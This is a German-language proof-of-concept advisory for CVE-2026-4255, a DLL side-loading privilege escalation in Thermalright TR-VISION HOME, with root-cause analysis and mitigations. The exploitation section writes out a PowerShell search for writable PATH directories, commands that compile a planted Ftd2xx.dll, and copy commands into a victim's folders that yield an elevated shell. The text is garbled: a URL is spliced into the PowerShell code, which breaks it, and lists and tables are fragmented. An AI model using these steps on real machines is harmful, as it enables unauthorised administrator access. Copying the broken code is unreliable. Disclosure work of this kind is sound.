
Proof-of-Concept für CVE-2026-4255: DLL-Side-Loading-Privilege-Escalation in Thermalright TR-VISION HOME über PATH-Directory-Planting, mit vollständiger Ursachenanalyse und Anleitung zur Risikominderung.
Schweregrad: HOCH (CVSS 8.4)
CWE: CWE-829 Einbindung von Funktionalität aus einer nicht vertrauenswürdigen Kontrollsphäre
Veröffentlicht: 16/03/2026
CNA: Toreon
Betroffene Versionen: Thermalright TR-VISION HOME ≤ 2.0.5 (Windows 64-Bit)
Entdeckt von: Ard33
Thermalright TR-VISION HOME lädt Ftd2xx.dll (FTDI USB-zu-seriell Bibliothek) unter Verwendung der standardmäßigen Windows-DLL-Suchreihenfolge. Diese Reihenfolge enthält benutzerbeschreibbare Verzeichnisse vor geschützten Systempositionen. Da TR-VISION HOME immer mit Administratorrechten ausgeführt wird und keine Integritäts- oder Signaturprüfung geladener Bibliotheken durchführt, kann ein Angreifer, der in ein beliebiges Verzeichnis auf dem PATH schreiben kann, eine präparierte Ftd2xx.dll platzieren und diese beim nächsten Start der Anwendung mit erhöhten Rechten laden.
Zum Platzieren der DLL sind keine Administratorrechte erforderlich. Ein Benutzer mit niedrigen Berechtigungen kann dies gegenüber jedem Benutzer ausnutzen, der anschließend TR-VISION HOME mit erhöhten Rechten startet.
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
| Metrik | Wert |
|---|---|
| Angriffsvektor | Lokal |
| Angriffskomplexität | Niedrig |
| Angriffsanforderungen | Keine |
Die Anwendung ruft LoadLibrary("Ftd2xx.dll") auf (oder importiert sie implizit beim Laden), ohne einen vollständig qualifizierten Pfad anzugeben. Windows löst die Bibliothek auf, indem es die in MSDN Dynamic-Link Library Search Order definierte Suchreihenfolge durchläuft:
C:\Windows\System32)PATH aufgeführt sind ← ausnutzbarEin Angreifer platziert Ftd2xx.dll in einem benutzerbeschreibbaren Verzeichnis, das vor System32 in PATH erscheint. C:\Users\<User>\.local\bin) ist ein solches Verzeichnis und standardmäßig in PATH vorhanden, was es zu einem zuverlässigen Ablageort macht.
| Software | Version | Plattform |
|---|---|---|
| Thermalright TR-VISION HOME | ≤ 2.0.5 | Windows x64 |
Getestet auf TR-VISION HOME 2.0.5 unter Windows 11.
%PATH% vorhanden ist1. Ein beschreibbares PATH-Verzeichnis identifizieren
$env:PATH -split ';' | Where-Object {
if (-not $_ -or -not (Test-Path $_)) { return $false }
try {
$t = Join-Path $_ '.wrtest'
[System.IO.File]:https://raw.githubusercontent.com/ard33/cve-2026-4255/HEAD/:Create($t).Close()
Remove-Item $t -Force
$true
} catch { $false }
}
Ein zuverlässiger Standard: C:\Users\<User>\.local\bin
2. Die PoC-DLL kompilieren
MinGW (Cross oder nativ):
gcc -shared -o Ftd2xx.dll poc/Ftd2xx.c -Wl,--out-implib,Ftd2xx.lib
MSVC:
cl /LD poc\Ftd2xx.c /Fe:Ftd2xx.dll
3. Die DLL platzieren
Wählen Sie ein beliebiges beschreibbares Verzeichnis aus Schritt 1. Zwei häufige Standardverzeichnisse:
:: uv / pipx default scripts directory
copy Ftd2xx.dll "C:\Users\<victim>\.local\bin\Ftd2xx.dll"
:: Python Launcher (standard Python install)
copy Ftd2xx.dll "C:\Users\<victim>\AppData\Local\Programs\Python\Launcher\Ftd2xx.dll"
Für diesen Schritt sind keine erhöhten Rechte erforderlich.
4. Auslösen
Das Opfer startet TR-VISION HOME (z. B. aus dem Startmenü oder der Taskleiste). Die UAC-Eingabeaufforderung führt die Anwendung mit Administratorrechten aus. Während der Initialisierung wird Ftd2xx.dll über die Suchreihenfolge aufgelöst, die platzierte Kopie wird vor System32 gefunden, und die DllMain des Angreifers wird innerhalb des erhöhten Prozesses ausgeführt.
5. Erwartetes Ergebnis
C:\Users\Public\CVE-2026-4255_pwned.txt wird erstellt, mit folgendem Inhalt:
TokenIsElevated = YES istProcmon zeigt TR-VISION HOME (PID 78940) bei der Suche nach Ftd2xx.dll über PATH-Verzeichnisse – alle geben NAME NOT FOUND zurück, bis die platzierte Kopie aufgelöst wird:

Ftd2xx.dll platziert in AppData\Local\Programs\Python\Launcher\ (Datum 26.12.2025 — Tag der Entdeckung):

Erhöhte cmd-Shell, die von der geladenen DLL gestartet wurde – Titelleiste bestätigt Administratorkontext:

TR-VISION HOME Version 2.0.5:

Für Thermalright:
Ftd2xx.dll zur Laufzeit mit einem vollständig qualifizierten Pfad:
LoadLibraryExA("C:\\Windows\\System32\\Ftd2xx.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
LOAD_LIBRARY_SEARCH_SYSTEM32 oder LOAD_LIBRARY_SEARCH_APPLICATION_DIR mit LoadLibraryEx.WinVerifyTrust.HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode = 1), obwohl dies PATH-basiertes Planting nicht vollständig entschärft.Für Benutzer (vorübergehend):
Ftd2xx.dll (aus dem FTDI D2XX-Treiberpaket) direkt im Installationsverzeichnis von TR-VISION HOME (z. B. C:\Program Files\TR-VISION HOME\). Das Anwendungsverzeichnis wird als erstes durchsucht, daher hat eine legitime Kopie dort Vorrang vor jedem PATH-basierten Planting.| Datum | Ereignis |
|---|---|
| 26/12/2025 | Schwachstelle entdeckt |
| 27/12/2025 | Hersteller (Thermalright) über Support-Kanäle kontaktiert |
| 16/03/2026 | Öffentliche Offenlegung CVE-2026-4255 von Toreon CNA zugewiesen |
Dieses Proof-of-Concept wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Die PoC-Nutzlast ist absichtlich harmlos – sie schreibt eine Textdatei und zeigt ein Meldungsfenster. Verwenden Sie es nur gegen Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für Missbrauch.
| Erforderliche Privilegien |
| Keine |
| Benutzerinteraktion | Aktiv (Opfer startet App) |